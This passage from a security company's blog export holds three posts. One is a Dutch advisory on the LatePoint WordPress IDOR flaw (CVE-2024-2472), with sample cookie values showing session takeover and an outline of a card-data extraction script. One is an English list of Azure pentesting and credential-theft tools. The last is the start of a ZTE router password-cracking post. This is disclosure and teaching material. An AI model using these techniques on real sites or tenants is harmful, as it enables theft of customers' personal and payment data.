Ossi","picture":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fusers%2F605118a0c452ea0751962bdb%2F8dcfdec2-f192-4322-8589-89d3b2969fc3%2F1660849684285.jpg?alt=media\u0026token=1a29fcec-1b74-4a92-828d-a71770a28755","desc":"Managing Director"},"DutchArticle":{"id":"666b83986e63d6dcdb0f73c0","updatedAt":"2024-07-01T22:19:49.838Z","createdAt":"2024-06-13T23:41:12.205Z","title":"Duizenden Creditcards voor het Oprapen door Kritiek Lek in LatePoint WordPress Plugin","body":"![CVE-2024-2472](\u003chttps://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F605118a0c452ea0751962bdb%2F238cefe8-91fc-46fc-bed2-7c1fa089c802%2FCVE-2024-2472.png?alt=media\u0026token=de8f51c7-eeb6-4b33-935a-e254fea443ea\u003e =1200x620)\n\n\n## Inleiding\n\nTijdens een recent beveiligingsonderzoek is een kritieke kwetsbaarheid geïdentificeerd in de LatePoint-plugin voor WordPress, die van invloed is op versies tot en met 4.9.9. Deze kwetsbaarheid, gecategoriseerd onder **CVE-2024-2472**, heeft een CVSS-score van **9.1 (Kritiek)** gekregen vanwege de ernstige gevolgen voor ongeautoriseerde toegang tot en wijziging van gegevens. De kwetsbaarheid ontstaat door een ontbrekende capaciteitscontrole in de functie `start_or_use_session_for_customer`, die gevoelige informatie blootstelt en ongeautoriseerde acties door aanvallers mogelijk maakt. De fout werd ontdekt door beveiligingsonderzoekers **Gharib Sharifi** en **Joel Aviad Ossi**, waarmee de potentiële risico's van deze plugin werden benadrukt.\n\n## Beschrijving van de Kwetsbaarheid\n\nDe LatePoint-plugin voor WordPress faciliteert het boeken en beheren van afspraken. De geïdentificeerde kwetsbaarheid is een Insecure Direct Object Reference (IDOR) die wordt veroorzaakt door onjuiste omgang met sessiecookies. Bij het boeken van een dienst, zoals een kappersafspraak, wijst de plugin een sessiecookie toe aan de gebruiker. Deze cookie bevat een numerieke waarde die rechtstreeks correleert met de sessie van de gebruiker en hun persoonlijke informatie.\n\nHet kritieke probleem ligt in de wijzigbare aard van deze cookie-waarde. Een aanvaller kan het numerieke deel van de cookie manipuleren (bijvoorbeeld `6606` veranderen in `6605`) om ongeautoriseerde toegang te krijgen tot sessies van andere gebruikers. Dit kan leiden tot blootstelling van gevoelige persoonlijke informatie, waaronder namen, achternamen, geboortedata en telefoonnummers. Bovendien kan een aanvaller, als de website het beheer van afspraken toestaat, afspraken wijzigen, annuleren of maken onder de identiteit van een andere gebruiker.\n\n## Proof of Concept\n\nOm de kwetsbaarheid te demonstreren, overweeg de volgende proof of concept:\n\n1. **Initiatie van Gebruikerssessie**: Een gebruiker bezoekt een website die de LatePoint-plugin gebruikt en boekt een dienst, waarbij een sessiecookie wordt ontvangen. Bijvoorbeeld, een klant genaamd John Doe boekt een afspraak en krijgt een cookie met de volgende waarde:\n\n```\nGebruikerID||Tijdstempel||Hash\n```\n\nVoorbeeldwaarde voor wijziging:\n```\n5%7C%7C1703097251%7C%7C7c8c3c2ca3e8f499583a474cd292c0767eb4559ae159e5477b8e7340b2eb8295\n```\n\n2. **Cookie Manipulatie**: Een aanvaller onderschept en wijzigt het GebruikerID-gedeelte van de cookie-waarde om over te schakelen naar een andere gebruikerssessie. Bijvoorbeeld, `5` veranderen in `1`:\n\n```\n1%7C%7C1703097251%7C%7C7c8c3c2ca3e8f499583a474cd292c0767eb4559ae159e5477b8e7340b2eb8295\n```\n\n3. **Ongeautoriseerde Toegang**: De aanvaller ververst de pagina, waardoor toegang wordt verkregen tot de eerder ingevoerde gegevens en de functionaliteiten voor afsprakenbeheer van de gewijzigde gebruikerssessie. Deze ongeautoriseerde toegang kan persoonlijke informatie onthullen en de aanvaller in staat stellen afspraken te manipuleren.\n\n## Gedetailleerd Onderzoek en Impact\n\nDe kwetsbaarheid werd voor het eerst ontdekt door Gharib Sharifi en verder ontwikkeld tot een volledige proof-of-concept door Joel Aviad Ossi. Hun onderzoek toonde de potentiële impact op gevoelige betalingsinformatie (PII) aan, inclusief de exfiltratie van creditcardgegevens. Deze samenwerking benadrukte de ernstige gevolgen van deze kwetsbaarheid, wat resulteerde in een kritieke impactscore van 9.1 door Wordfence.\n\n### Uitleg over de Exploit\n\nOm misbruik te voorkomen, is het exploit-script dat is gebruikt om deze kwetsbaarheid te demonstreren niet inbegrepen in dit blog. Hier is echter een uitleg van de functionaliteit:\n\n1. **Initialisatie en Setup**: Het script zet een sessie op en vraagt de gebruiker om de doelwebsite in te voeren.\n\n2. **Cookie Handling**: Het script stuurt een verzoek naar de doelwebsite om de originele sessiecookie te verkrijgen. Het wijzigt vervolgens het GebruikerID-gedeelte van de cookie om door verschillende gebruikerssessies te itereren.\n\n3. **Gelijke uitvoering**: Met behulp van een thread pool verwerkt het script gelijktijdig meerdere gebruikers-ID's om het exploitatieproces te versnellen.\n\n4. **Gegevens Extractie**: Voor elke gewijzigde sessie stuurt het script verzoeken om gevoelige informatie op te halen, waaronder namen, e-mailadressen, creditcardnummers, vervaldatums en beveiligingscodes. De geëxtraheerde gegevens worden vervolgens in een bestand opgeslagen.\n\nDeze uitleg benadrukt hoe een aanvaller mogelijk hele databases met gevoelige informatie, waaronder creditcardgegevens, zou kunnen dumpen door de kwetsbaarheid in de LatePoint-plugin te misbruiken.\n\n## Herstel\n\nDe kwetsbaarheid is gepatcht in versie 4.9.9.1 van de LatePoint-plugin. Gebruikers wordt sterk aangeraden om naar deze versie of nieuwere gepatchte versies bij te werken om het risico van ongeautoriseerde toegang en gegevensblootstelling te verminderen.\n\n- **Gepatchte Versie**: 4.9.9.1\n- **Getroffen Versies**: \u003c= 4.9.9\n\n## Uitzondering\n\nDe exploit werkte niet voor plugingebruikers wanneer de instelling \"Gebruik WordPress-gebruikers als klanten\" was uitgeschakeld.\n\n## Conclusie\n\nDe ontdekking en mitigatie van de IDOR-kwetsbaarheid in de LatePoint-plugin benadrukt de kritieke noodzaak van rigoureuze beveiligingscontroles bij softwareontwikkeling. Deze casus dient als een herinnering aan de potentiële risico's die gepaard gaan met onveilige sessiebeheer en het belang van het implementeren van juiste capaciteitscontroles om gevoelige informatie te beschermen. Gebruikers van de LatePoint-plugin dienen snel bij te werken naar de nieuwste versie om hun gegevens te beschermen en veilige operaties te handhaven.\n\nVoor verdere details en technische inzichten, raadpleeg de gepubliceerde rapporten van de ontdekkers en de Wordfence Intelligence-gebruikersinterface.\n\n## CVSS Risco Tabel\n\n![RiskTable.jpg](https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F605118a0c452ea0751962bdb%2F742af55e-9bf6-44d9-aa51-03e0bd9d11e8%2Frisktable.jpg?alt=media\u0026token=b72fbff1-1a76-4405-ac49-24ef33710972)\n\n## Referenties\n\n- [wpdocs.latepoint.com](https://wpdocs.latepoint.com)\n- [wordfence](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/LatePoint/latepoint-plugin-499-missing-authorization-and-sensitive-information-exposure-via-idor)","summary":"De LatePoint-plugin voor WordPress was kwetsbaar voor ongeautoriseerde toegang tot gegevens door een IDOR, waardoor klantbetalingsgegevens zoals creditcards konden worden bekeken.","image":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F605118a0c452ea0751962bdb%2Fbba833b1-1c33-45a4-9ffd-a38c7e540eeb%2FDALL%C2%B7E%202024-06-14%2000.52.28%20-%20A%20hacker%20wearing%20a%20hoodie%2C%20sitting%20in%20front%20of%20multiple%20computer%20screens%20in%20a%20dimly%20lit%20room.%20The%20hacker's%20face%20is%20obscured%20by%20shadows.%20In%20the%20center%20.webp?alt=media\u0026token=bdb2aa71-edd6-4ff7-806e-1640ff1a5880","format":"md","published":true,"tags":["exploitatie","Gharib Sharifi","CVE-2024-2472"],"locale_code":"nl","user_id":"605118a0c452ea0751962bdb","dutchArticleId":null,"priority":1718322072205,"User":{"name":"Joel Aviad Ossi","picture":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fusers%2F605118a0c452ea0751962bdb%2F8dcfdec2-f192-4322-8589-89d3b2969fc3%2F1660849684285.jpg?alt=media\u0026token=1a29fcec-1b74-4a92-828d-a71770a28755","desc":"Managing Director"}}},{"id":"661c326880f704dc4b2bbeca","updatedAt":"2024-06-29T00:43:52.212Z","createdAt":"2024-04-14T19:45:44.316Z","title":"An Introductory Guide to Pentesting Azure: Benefits and Tools: Part 2","body":"\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003e\u003cimg loading=\"lazy\" height=\"928\" width=\"1768\" alt=\"Azure Pentesting\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F61e2ba4446041c77accc8276%2F4046e8c0236da38063646d23f3d4005d%2F7g4pqf27992x4LfvWfIAv?alt=media\"\u003e\u003cbr\u003eIn the first part of this introductory guide to pen testing Azure, we discussed the approaches under different cloud environments, industry best practices, and activities allowed and prohibited by Microsoft. In this second part, we’ll review the benefits of penetration testing in Azure. We’ll also cover the most popular tools for penetration testing in Azure.\u003c/span\u003e\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003eBenefits of Cloud Penetration Testing\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eCloud penetration testing, especially for Azure, is beneficial for many reasons. Let’s run through some of them.\u003c/span\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eTo identify unknown Vulnerabilities and Prevent Risks in advance\u003c/strong\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eIdentifying vulnerabilities in apps, services, and cloud infrastructure is perhaps the most obvious reason why organizations must conduct penetration testing. This allows the penetration tester to recommend remediation measures that ensure the organization takes proactive steps to resolve the problems before malicious actors exploit them.\u003c/span\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eGet an Objective Assessment\u003c/strong\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003ePenetration Testers offer an unbiased perspective. Their objective analysis uncovers vulnerabilities that internal users or security assessment teams might miss or underestimate, necessitating deeper exploration.\u003c/span\u003e\u003c/p\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eThis could be because external experts prioritize identifying potential exploits within Azure systems and software rather than fixating on the specifics of the deployment environment.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eMeet Data Security Compliance and Demonstrate Due Diligence\u003c/strong\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eRegulatory laws are changing and becoming more stringent daily, specifically for highly regulated industries like healthcare, financial services, and the public sector. Compliance regulations like the HIPAA, GDPR, and the PCI DSS make it crucial for enterprises to be proactive with their security assessments.\u003c/span\u003e\u003c/p\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eAs your organization is under increased scrutiny to protect customer data, cloud pen testing efforts demonstrate to stakeholders and customers that you take data security seriously and conduct due diligence proactively.\u003c/span\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eImprove Enterprise Security Posture and Enhance Cyber Resilience\u003c/strong\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eConducting regular penetration testing is crucial to enhance the organization’s overall security posture and enhance cyber resilience. It empowers your enterprise to fine-tune security measures, configurations, and policies specific to your cloud infrastructure, reducing the chances of security incidents and data breaches.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003ePopular Azure Pentesting Tools\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eThere are many pen testing tools for Azure platforms. Depending on the stages of penetration testing and security assessments, here are some popular and powerful tools to use:\u003c/span\u003e\u003c/p\u003e\n\u003ch3\u003e\u003cstrong\u003eTools for Azure Information Gathering\u003c/strong\u003e\u003c/h3\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eAfter gaining access to the target organization’s Azure AD, the first intent should be to gather as much information as possible. This includes users, groups, roles, permissions, resources, configurations, policies, and other relevant data. The following tools can help with information gathering in Azure:\u003c/span\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eBloodHound’s Azure Hound: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eThe Azure Hound is a powerful tool for surveillance and information gathering in Azure environments, specifically for \u003c/span\u003e\u003cstrong\u003eprivilege escalation paths and potential attack vectors\u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003e. After using Azure Hound to collect the data, you can then feed it into the BloodHound database for security analysis. Azure Hound \u003c/span\u003e\u003cstrong\u003evisualizes the Azure AD environment\u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003e in graph format, helping you highlight relationships between users, groups, roles, and resources.\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003e\u003cimg loading=\"lazy\" height=\"476\" width=\"828\" alt=\"\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F61e2ba4446041c77accc8276%2F0e6fee2de51c4c0455074e36f038c1e7%2Frm479T3hMSs2jpa3jE7Au?alt=media\"\u003e\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eROADTools: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eThis framework uses tools to interact with Azure AD when pen testing. It includes tools for reconnaissance (ROADrecon), enumeration, privilege escalation (ROADtx), and exploitation in Azure.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eo365recon: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eThis is a powerful tool that red teams and pen testers use for initial access and information gathering when valid credentials are available. It helps gather data like users, accounts, groups, permissions, configurations, Azure AD settings, and other necessary information in Microsoft 365 (M365) environments, such as Azure AD.\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eAzure Logic Apps Scanner: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eIf you’re using Logic Apps in your environment, you might want to consider using Azure Logic Apps Scanner. It can help find security weaknesses and misconfigurations within your Logic App workflows.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eSCuBA M365 Security Baseline Assessment Tool: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eThe Security Configuration and Usage Baseline Analyzer, or SCuBA Gear, assesses security configurations and checks if they adhere to \u003c/span\u003e\u003ca href=\"https://www.cisa.gov/news-events/news/cisa-finalizes-microsoft-365-secure-configuration-baselines\"\u003e\u003cspan style=\"font-weight: 400;\"\u003eCISA’s security baseline for M365\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-weight: 400;\"\u003e.\u0026nbsp; These baselines offer policy configuration recommendations that are easy to adopt and align with each organization's specific requirements and risk tolerance levels. The detailed reports highlight gaps and non-compliance, allowing organizations to prioritize and address them quickly.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003e\u003cimg loading=\"lazy\" height=\"485\" width=\"940\" alt=\"\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F61e2ba4446041c77accc8276%2Fde62465a140f27f0b3b9da8675a10d93%2F1FQxZikWK1x5gGHm9wZiw?alt=media\"\u003e\u003c/span\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong style=\"font-size: 1.125rem;\"\u003eGet-MsolRolesAndMembers.ps1: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eThis is a PowerShell script that helps manage \u003c/span\u003e\u003cstrong style=\"font-size: 1.125rem;\"\u003erole-based access control (RBAC)\u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003e and permissions. When conducting Azure pen testing, this script can help retrieve a list of roles and associated role members.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eOther tools like \u003c/span\u003e\u003cstrong\u003eSparrow.ps1, Hawk, Azurite, Cloud Katana \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003e(serverless computing platforms)\u003c/span\u003e\u003cstrong\u003e, and PowerZure\u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003e are also great for information gathering in the Azure/M365 environment.\u003c/span\u003e\u003c/p\u003e\n\u003ch3\u003e\u003cstrong\u003eTools for Azure Enumeration\u003c/strong\u003e\u003c/h3\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eEnumeration can provide deeper insights into Azure resources, services, endpoints, privilege relationships, and potential attack surfaces in an Active Directory or Azure environment. It can help identify Azure VMs, storage accounts, network configurations, databases, and other components.\u003c/span\u003e\u003c/p\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eMost of the tools above for information gathering, such as BloodHound, also work here. However, here are some more specific tools to use for Azure enumeration:\u003c/span\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eo365creeper: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eThis tool is useful for enumerating valid email addresses within the M365 environment. As such, it can help identify active email accounts for targeted attacks or pen testing purposes.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eBlobHunter: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eBlobHunter scans Azure Blob Storage accounts for publicly accessible containers and blobs. This can help identify potential security risks caused by misconfigurations that expose sensitive data to the public. An alternative tool is \u003c/span\u003e\u003cstrong\u003eGrayhat Warfare\u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003e, which can also be used to scan AWS buckets.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eCloudBrute: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eAlthough not specifically designed for Azure, it is still a good tool for checking an organization’s cloud foodprint. It can search for the company’s cloud infrastructure resources across various cloud providers.\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eAzucar: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eIt assesses Azure security configurations, permissions, and potential vulnerabilities.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eScoutSuite: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eLike CloudBrute, this multi-cloud security auditing tool assesses security posture in different cloud environments.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eOther tools for enumeration in Azure environments include \u003c/span\u003e\u003cstrong\u003eCloudFox, Monkey365, and Prowler\u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003e. Using the \u003c/span\u003e\u003cstrong\u003eAzure-Access Permissions\u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003e, a PowerShell script, is a good idea to enumerate access permissions and audit access controls in Azure AD.\u003c/span\u003e\u003c/p\u003e\n\u003ch3\u003e\u003cstrong\u003eTools for Azure Lateral Movement\u003c/strong\u003e\u003c/h3\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eAfter gaining access to Azure AD, an attack vector will typically try to access different resources with the access token information of the user it compromised. This lateral movement is usually in a bid to get the access token information of a superior user. Here are tools to help you perform lateral movement in Azure.\u003c/span\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eStormSpotter: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eAs a Penetration Tester, StormSpotter can help run automated scans and checks against Azure Configurations, ARM templates, NSGs, Azure Policies, etc. It can pinpoint open ports, exposed services, and outdated software versions. Additionally, it is great for helping you stay compliant.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003e\u003cimg loading=\"lazy\" height=\"810\" width=\"1440\" alt=\"\" src=\"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F61e2ba4446041c77accc8276%2F16c58e9eda7977263ffe935dfa74f4f6%2FZNG0AkX5lZTqKsa5Ayleg?alt=media\"\u003e\u003c/span\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eAzureADLateralMovement: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eThis is an effective tool for creating a lateral movement graph for the Azure Active Directory. It provides insights into potential paths and possible techniques that attackers could use to move laterally within a tenant’s Azure AD environment.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eSkyArk: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eHelps to discover, assess, and secure high-privileged accounts, roles, and resources that are critical targets for lateral movement and privilege escalation attacks.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eOmigood (OM I GOOD?): \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eA vulnerability scanner that helps to identify and remediate vulnerabilities in Azure VMs that could be exploited for lateral movement.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eRubeus: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eThis tool can be used for lateral movement and privilege escalation in Azure environments. You can perform pass-the-ticket attacks, create \u003c/span\u003e\u003ca href=\"https://www.ibm.com/docs/en/sc-and-ds/8.4.0?topic=concepts-kerberos-ticket\"\u003e\u003cspan style=\"font-weight: 400;\"\u003eKerberos tickets\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-weight: 400;\"\u003e, extract \u003c/span\u003e\u003ca href=\"https://learn.microsoft.com/en-us/windows/win32/secauthn/ticket-granting-tickets\"\u003e\u003cspan style=\"font-weight: 400;\"\u003eticket-granting tickets\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-weight: 400;\"\u003e (TGTs), and other techniques to move laterally and escalate privileges within Azure Active Directory. It should be worth mentioning that Rubeus’ functionality might be limited depending on the specific Azure AD configuration.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eIt’s worth mentioning that BloodHound and PowerZure, which I mentioned earlier, have tools and scripts for lateral movement and post-exploitation in Azure.\u003c/span\u003e\u003c/p\u003e\n\u003ch3\u003e\u003cstrong\u003eTools for Azure Exploitation\u003c/strong\u003e\u003c/h3\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eThis step involves exploiting the vulnerabilities identified during earlier stages. Some exploitation tools for Azure environments include:\u003c/span\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eBlueMap: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eThis is an effective network reconnaissance and interactive exploitation tool. It can help save complex operational security and overhead. Note that BlueMap can also be \u003c/span\u003e\u003cstrong\u003euseful in the enumeration stage, \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003ehelping you automate some tedious tasks.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eMicrosoft-Teams-GIFShell: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eThis tool can be used to identify \u003c/span\u003e\u003cstrong\u003eRemote Code Execution (ROE), \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003ewhich allows an attacker to execute code on a victim's machine using GIFs sent through Teams messages. As a Pen Tester, you can use it to \u003c/span\u003e\u003cstrong\u003echeck if such vulnerabilities\u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003e exist and exploit them to assess the potential impact.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cul\u003e\n\u003cli aria-level=\"1\"\u003e\u003cstrong\u003eMimikatz: \u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003eThis is particularly popular for post-exploitation, where you can harvest credentials, perform pass-the-hash attacks, and escalate privileges within Azure environments.\u003c/span\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eIn addition, you can use the \u003c/span\u003e\u003cstrong\u003eazuread_decrypt_msol_v2.ps1\u003c/strong\u003e\u003cspan style=\"font-weight: 400;\"\u003e script to extract and decrypt sensitive credentials related to Azure AD Msol service accounts, which can then facilitate further exploitation opportunities.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\n\u003ch2\u003e\u003cstrong\u003eConclusion\u003c/strong\u003e\u003c/h2\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eAzure pen testing is not only great for identifying vulnerabilities but also helps you demonstrate compliance, enhance cyber resilience, and prepare your team to respond proactively to real-world threats.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eAt WebSec, our team of Penetration Testers and Ethical Hackers help you unearth unknown vulnerabilities in your Azure systems and applications. We provide detailed remediation reports that ensure you fix any weaknesses before malicious actors capitalize on them. This facilitates business continuity by ensuring your customers' sensitive data is always safe and you remain compliant.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\n\u003cp\u003e\u003cspan style=\"font-weight: 400;\"\u003eReady to fortify your security posture, or do you have questions about our working methods? We're always happy to help. \u003c/span\u003e\u003ca href=\"../../en/#contact\"\u003e\u003cspan style=\"font-weight: 400;\"\u003eContact us today\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-weight: 400;\"\u003e.\u003c/span\u003e\u003c/p\u003e","summary":"In this guide to pentesting Azure, we discuss the benefits of cloud penetration tests and the best Azure tools to identify \u0026 fix vulnerabilities.","image":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F61e2ba4446041c77accc8276%2Fa6522ece437f68d0e93a1f74eff1a57a%2FAzure2.png?alt=media","format":"html","published":true,"tags":[],"locale_code":"en","user_id":"61e2ba4446041c77accc8276","dutchArticleId":null,"priority":1713123944316,"User":{"name":"Gray Oshin","picture":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fusers%2F61e2ba4446041c77accc8276%2F90021e57215f4d94a8a76d9dcb50fac3%2FiY_JMCQtoFXfO-jtIWB2C?alt=media","desc":"A Team Member at Websec"},"DutchArticle":null},{"id":"66190e773cc251453bda7a0c","updatedAt":"2024-06-29T00:43:52.207Z","createdAt":"2024-04-12T10:35:35.334Z","title":"Hack ZTE router's admin panel","body":"\u003cp\u003eLet's say that you are connected to a public Wi-Fi. How difficult is it to crack the password to the admin panel of the router?\u003c/p\u003e\n\u003cp\u003eAs an ethical hacker, I frequently investigate the complexities of network security in order to better understand potential vulnerabilities and strengthen cybersecurity measures. One yeara ago, I conducted an experiment to determine the security of my home router, a ZTE ZXHN H298A. Given the proliferation of public Wi-Fi networks and the growing reliance on routers for internet connectivity, understanding the possible hazards connected with these devices is critical for protecting against cyber threats.\u003c/p\u003e\n\u003cp\u003eIn this experiment, I aimed to determine the vulnerability of my ZTE router's admin panel against password cracking efforts. While ethical hacking aims to uncover and repair security holes before they are exploited maliciously, it also educates and raises awareness about the significance of strong cybersecurity practices.\u003c/p\u003e\n\u003cp\u003eWith the growth of public Wi-Fi networks, both individuals and companies rely on routers to ensure secure and smooth internet access. However, the security of these devices is frequently disregarded, making them susceptible to a variety of cyber attacks. By investigating the security posture of my own router, I hoped to provide light on the various dangers and vulnerabilities that users might encounter.\u003c/p\u003e\n\u003cp\u003eThe ZTE ZXHN H298A router model is well-known for its dependability and performance. It includes an admin panel that can be accessed via a web interface, as do many routers on the market. This panel allows users to customize a variety of settings, including network parameters and security measures. However, the security of the admin panel is dependent on the strength of the password used to access it.\u003c/p\u003e\n\u003cp\u003eIn this experiment, I used ethical hacking techniques to test the strength of the admin panel's password against cracking attempts. I hoped to discover any flaws in the router's security by recreating real-world circumstances and utilizing specialist tools and approaches.\u003c/p\u003e\n\u003cp\u003eI hope that this experiment will highlight the significance of having strong security measures to protect routers and other network devices from cyber assaults. By raising awareness about the vulnerabilities that exist in these devices, I aim to empower users to take proactive steps to secure their networks and safeguard their sensitive information.\u003c/p\u003e\n\u003cp\u003eSo, I decided to conduct an experiment on my home router \u003cstrong\u003eZTE ZXHN H298A, 